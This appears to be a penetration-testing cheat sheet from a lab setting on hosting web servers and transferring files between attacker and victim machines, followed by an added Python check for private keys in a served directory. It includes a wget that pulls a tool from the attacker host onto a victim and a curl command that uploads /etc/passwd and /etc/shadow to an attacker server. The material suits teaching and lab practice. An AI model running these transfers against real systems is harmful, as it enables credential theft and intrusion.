Python3
Via web:
# On our machine:
python3 -m http.server 8888
# On victim machine:
wget http://10.10.16.5:8888/pspy64
chmod +x pspy64
Python2
python -m SimpleHTTPServer 7331
PHP
php -S 0.0.0.0:8080
Ruby
ruby -run -e httpd . -p 9000
Busybox
busybox httpd -f -p 10000
Surge.sh
This is an excellent option for hosting an Internet-exposed web server. First we need to install surge with npm:
npm install --global surge
Then we need to run the surge command and provide the details needed to host our web server:
- Project path: every file in this directory will be hosted.
- Name of your web server: this is the subdomain you choose, and it must use surge.sh as its domain. If the name is already taken, it won’t work.
surge

   Running as shuciran@gmail.com (Student)

        project: /opt/test/
         domain: blue-eyed-harmony.surge.sh
         upload: [====================] 100% eta: 0.0s (1 files, 15 bytes)
            CDN: [====================] 100%
     encryption: *.surge.sh, surge.sh (48 days)
             IP: 138.197.235.123

   Success! - Published to blue-eyed-harmony.surge.sh
If this is the first time, you’ll need to provide an e-mail and a password.
If you want to exploit XSS, SSRF or any vulnerability from another server, you’ll need to host a CORS file with content “*”; this way you’ll allow consumption of resources from external entities.
Web Server Upload
Let’s see how we can configure the uploadserver module to use HTTPS for secure communication.
1) Install the uploadserver module.
Shuciran@htb[/htb]$ sudo python3 -m pip install --user uploadserver
2) Create a self-signed certificate.
Shuciran@htb[/htb]$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
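The web server should not host the certificate: the command above writes the private key into the same server.pem file (-out and -keyout both point to it). We recommend creating a new directory to host the files for our web server.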
3) Start Web Server
Shuciran@htb[/htb]$ mkdir https && cd https
Shuciran@htb[/htb]$ sudo python3 -m uploadserver 443 --server-certificate /root/server.pem
File upload available at /upload
Serving HTTPS on 0.0.0.0 port 443 (https://0.0.0.0:443/) ...
4) Transfer the file via curl
Shuciran@htb[/htb]$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
We used the --insecure option because we used a self-signed certificate that we trust; the option makes curl skip certificate verification.
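As an added example (not part of the original page or of the uploadserver project), the following pre-flight check backs up the advice in step 2 that the web server should not host server.pem: it scans a directory that is about to be served for PEM private key headers. The names find_private_keys and demo, and the sample directory layouts, are assumptions made for illustration.

```python
import os
import re
import tempfile

# PEM header of a private key: PKCS#8, encrypted, RSA, EC or OpenSSH.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----")
MAX_SCAN_BYTES = 1024 * 1024  # read at most 1 MiB per file


def find_private_keys(webroot):
    """Return sorted paths (relative to webroot) of files holding a PEM private key."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read(MAX_SCAN_BYTES)
            except OSError:
                continue  # unreadable or dangling symlink: skip
            if PRIVATE_KEY_RE.search(data):
                hits.append(os.path.relpath(full, webroot))
    return sorted(hits)


def demo():
    """Scan two constructed layouts: key inside the served directory vs. outside it."""
    # Constructed sample with PEM headers only; the body is not real key material.
    pem = (b"-----BEGIN PRIVATE KEY-----\nCONSTRUCTED\n-----END PRIVATE KEY-----\n"
           b"-----BEGIN CERTIFICATE-----\nCONSTRUCTED\n-----END CERTIFICATE-----\n")
    with tempfile.TemporaryDirectory() as top:
        # Layout 1: server started in the directory where openssl wrote server.pem.
        flat = os.path.join(top, "flat")
        os.makedirs(flat)
        for name, body in (("server.pem", pem), ("notes.txt", b"constructed\n")):
            with open(os.path.join(flat, name), "wb") as fh:
                fh.write(body)
        # Layout 2: server.pem stays in the parent, only ./https is served.
        parent = os.path.join(top, "split")
        served = os.path.join(parent, "https")
        os.makedirs(served)
        with open(os.path.join(parent, "server.pem"), "wb") as fh:
            fh.write(pem)
        with open(os.path.join(served, "notes.txt"), "wb") as fh:
            fh.write(b"constructed\n")
        return {"flat": find_private_keys(flat), "split": find_private_keys(served)}


if __name__ == "__main__":
    print(demo())
```

Running find_private_keys(".") in the directory before starting http.server or uploadserver should return an empty list.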